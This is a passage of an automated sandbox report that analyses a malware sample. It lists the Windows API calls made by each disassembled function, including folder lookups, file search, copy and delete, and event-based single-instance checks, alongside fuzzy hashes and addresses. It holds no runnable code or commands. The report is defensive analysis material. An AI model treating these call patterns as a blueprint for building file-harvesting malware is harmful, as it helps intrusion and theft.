                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: 88115EB1A85218EFEB208B54DC49FA9B7B8FB05721F2043EAE51AA32C0CB7459408F51
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s
                                                        • String ID:
                                                        • API String ID: 3330995566-0
                                                        • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction ID: 20c5b141558a6be6df08f9158868b7d286a7a7090efdc5f179973c2f05451fa0
                                                        • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction Fuzzy Hash: BA11B3B4E40209EFDB14CFA6D988BAEB7F5EB08B05F20C129E025A6250D7B49605CF55
                                                        APIs
                                                        • CreateFileA.KERNEL32(00B33D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B33D55,?), ref: 00B39563
                                                        • GetFileSizeEx.KERNEL32(000000FF,00B33D55), ref: 00B39580
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B3958E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID:
                                                        • API String ID: 1378416451-0
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: a8a06e432725a3782b44bbe21fa07cfae037a8abeca972ee8d1c772f7085e930
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 95F04F39E40308BBEB25DFF0DC49B9E77FAEB59710F21C694FA11A7280D67596418B40
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                        • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                        • ExitProcess.KERNEL32 ref: 00B36D89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction ID: 94253fe0dac063937720b64dfbe29e5cf2020f726d4873691d800b8c8f344cb8
                                                        • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction Fuzzy Hash: D8F0BE38A40205BFE710AFE0CC0ABBD77B4EB05301F3085B8F112A11D0CBB04500CA56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `o@
                                                        • API String ID: 0-590292170
                                                        • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                        • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                        • lstrcatA.KERNEL32(?,0082AA30), ref: 00414C08
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0082B7A0,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: UaA
                                                        • API String ID: 2104210347-3893042857
                                                        • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                        • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SystemTimelstrcpy
                                                        • String ID: cI@$cI@
                                                        • API String ID: 62757014-1697673767
                                                        • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                        • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                        • lstrcatA.KERNEL32(?,0082B2F0), ref: 004150A8
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                        • String ID: aA
                                                        • API String ID: 2699682494-2567749500
                                                        • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                        • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2BF06
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B2BF34
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2C00C
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2C020
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID:
                                                        • API String ID: 1440504306-0
                                                        • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction ID: c268e11c0ebc0aa9c18c9fda7a4d8380410d0f9f41d3d1bf079d4a102e6748b1
                                                        • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction Fuzzy Hash: 7AB16372910218ABCB14FBA0DD96EEE77B9AF15301F705199F446620A1EF346F48CF62
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFileNextlstrcat
                                                        • String ID: !=A
                                                        • API String ID: 3840410801-2919091325
                                                        • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                        • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                        APIs
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B351E1
                                                        • lstrcat.KERNEL32(?,00421070), ref: 00B351FE
                                                        • lstrcat.KERNEL32(?,0064A5F8), ref: 00B35212
                                                        • lstrcat.KERNEL32(?,00421074), ref: 00B35224
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                          • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                          • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                          • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction ID: d79962a528f697bc759fb9fa8093bf7bda692bbfafcaac03161388312a52c6d0
                                                        • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction Fuzzy Hash: 9B21DD7AA402147BC714FBF0EC46EE973BDAB55300F4045C8768992191EE749AC9CF92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID:
                                                        • API String ID: 1206339513-0
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: 69d18565d389b8bb58a82cb6ecb2cd40c66ee4284a7c45517a8fa544f3a4b8cf
                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction Fuzzy Hash: 20011E79540108FFCB04DFECD984EAE7BBAEF45354F108148F9098B300C631AA40DB91